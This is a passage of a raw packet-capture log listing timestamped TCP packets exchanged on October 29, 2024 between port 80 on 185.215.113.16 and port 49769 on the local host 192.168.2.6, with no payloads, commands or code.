Oct 29, 2024 06:59:26.906279087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906287909 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906317949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906351089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906363010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906385899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906419992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906441927 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906454086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906487942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906521082 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906534910 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906553984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906564951 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906588078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906620026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906629086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906653881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906687975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906702995 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906722069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906757116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906773090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906790972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906822920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906833887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906857967 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906891108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906907082 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906924009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906956911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906965017 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906990051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907022953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907056093 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907062054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907088995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907121897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907135963 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907154083 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907155991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907193899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907228947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907238960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907264948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907298088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907310009 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907350063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907382965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907416105 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907426119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907445908 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907449007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907483101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907516956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907525063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907551050 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907584906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907618046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907629967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907651901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907684088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907697916 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907700062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907712936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907716036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907732010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907747984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907763958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907768011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907779932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907790899 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907798052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907814026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907816887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907830000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907843113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907857895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907861948 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907874107 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907883883 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907890081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907905102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907907009 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907921076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907936096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907949924 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907953024 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907968998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.907974958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.907984972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908005953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908015966 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908020973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908032894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908036947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908052921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908067942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908082962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908083916 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908097982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908111095 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908116102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908133030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908145905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908147097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908160925 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908162117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908178091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908201933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908204079 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908216953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908232927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908241987 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908250093 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908266068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908273935 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908282042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908297062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908312082 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908315897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908329964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908333063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908345938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908361912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908376932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908379078 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908392906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908404112 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908409119 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908426046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908427954 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908442020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908457041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908468008 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908473015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908488989 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908494949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908505917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908519983 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908535957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908536911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908551931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908557892 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908567905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908582926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908597946 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908598900 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908615112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908620119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908649921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908734083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908749104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908762932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908778906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908793926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908799887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908807039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908811092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908828974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908844948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908852100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908862114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908876896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908891916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908898115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908907890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908920050 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908924103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908941984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908946991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.908958912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908973932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.908988953 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.909013987 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.935317039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.940802097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.940855980 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.940892935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.940926075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.940953970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.940979004 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.940984011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941014051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941050053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941066027 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941083908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941126108 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941134930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941170931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941204071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941236973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941251993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941281080 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941287994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941324949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941360950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941366911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941395998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941437006 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941447020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941481113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941517115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941550016 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941565990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941585064 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941618919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941627979 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941653013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941658020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941688061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941730976 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941737890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941772938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941808939 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941818953 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941843033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941876888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941905022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.941911936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941946030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941979885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.941989899 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942013979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942023993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942048073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942091942 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942107916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942142010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942178965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942212105 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942220926 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942254066 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942264080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942297935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942332029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942346096 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942367077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942410946 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942419052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942452908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942487001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942519903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942552090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942554951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942559004 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942589998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942624092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942645073 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942656994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942692041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942724943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942728996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942766905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942776918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942827940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942862034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942869902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.942897081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942933083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942971945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.942976952 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943007946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943016052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943042040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943077087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943111897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943113089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943165064 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943198919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943208933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943233013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943239927 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943268061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943320990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943339109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943373919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943407059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943439960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943450928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943471909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943506002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943516016 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943542004 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943547010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943577051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943614006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943615913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943650007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943685055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943695068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943720102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943753958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943787098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943799973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943825006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943856955 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943867922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943892002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943898916 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.943926096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943958998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.943964958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944010019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944042921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944051027 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944078922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944113970 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944155931 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944163084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944197893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944233894 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944241047 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944268942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944274902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944307089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944339991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944350958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944375038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944417000 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944425106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944458961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944493055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944502115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944526911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944561005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944567919 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944612980 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944647074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944655895 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944681883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944715977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944744110 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944747925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944782019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944786072 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944816113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944849968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944869041 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944885969 CET	80	49769	185.215.113.16	192.168.2.6
